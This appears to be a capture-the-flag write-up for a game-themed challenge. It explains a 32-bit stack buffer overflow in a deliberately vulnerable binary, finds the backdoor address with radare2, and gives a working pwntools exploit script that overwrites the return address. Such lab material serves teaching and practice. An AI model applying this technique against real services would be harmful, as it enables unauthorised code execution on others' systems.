[back to home](../index.html)

# MARTINA Challenge #1 - White Wolf

This challenge can be found when Martina gets some privacy and tries to get into her Penance rig.

## The Setup

> Incoming transmission...
>
> ==== WHITE WOLF ECHO ACTIVE ====
>
> TASK: ROOT PENANCE RIG
>
> SCANNING FOR VULNERABILITIES...
>
> VULNERABILITY FOUND: BOF
>
> BACKDOOR FUNCTION FOUND, OFFSET: 0x8049240

You will find a zip file containing a Dockerfile, a `.c` file and an ELF executable.

You will also be given access to a server running the executable over TCP.

## The Overflow

We will not go into what a buffer overflow is here. The best introduction you will get to buffer overflows is Aleph One's 1996 Phrack article [Smashing The Stack For Fun And Profit](https://phrack.org/issues/49/14).

In the program, the `char command[64]` buffer can be overflowed via the call to `scanf`.
What we are trying to do is jump to the `void backdoor()` function which will output the flag.
We need to find the address of `backdoor` and put it in the correct place, such that it will be used as the return address.

Let's use [Radare2](https://en.wikipedia.org/wiki/Radare2):

```bash
$ r2 penance-rig
[0x080490d0]> f~backdoor
0x08049240 168 sym.backdoor
```

This `0x08049240` address is the same one as is given in the intro text.

## The Padding

Now we need to figure out exactly where the return address sits on the stack, which should look something like this:

```
[64-byte command buffer] [other stuff] [saved EBP] [return address]
```

The `command` buffer is 64 bytes, but there's usually some extra padding between our buffer and the return address. On 32-bit systems, the saved EBP takes up 4 bytes right before the return address.

I tested different padding lengths until I found that 76 bytes gets us to overwrite the return address.

Let's put it all together in a Python script, `exploit.py`, using [pwntools](https://docs.pwntools.com/en/stable/):

```python
from pwn import *

conn = remote('localhost', 5000) 

payload = b"A" * 76  # buffer overflow padding to reach return address
payload += p32(0x08049240)  # target address (backdoor function) - 32-bit

# Wait until we are prompted for a command
print(conn.recvuntil(b"Enter a command:"))

# Send the payload
conn.sendline(payload)

# Print what we receive
print(conn.recvall())
```

Now, to test it locally:

```bash
$ docker build -t whitewolf .
$ docker run -p 5000:5000 -it whitewolf
```

and in another terminal:

```bash
$ uv run --with pwntools exploit.py
```

Here is our test flag! Now replace the remote connection to the one provided for the challenge, and you can get the real one.

<fieldset class="hacker-note">
  <legend>Hacker Mindset</legend>
  <p>This kind of buffer overflow is less relevant today than it was 20 years ago. Modern systems have tons of protections: stack canaries, ASLR, non-executable stacks, etc. But these challenges are still worth doing because they teach you how memory actually works.</p>
</fieldset>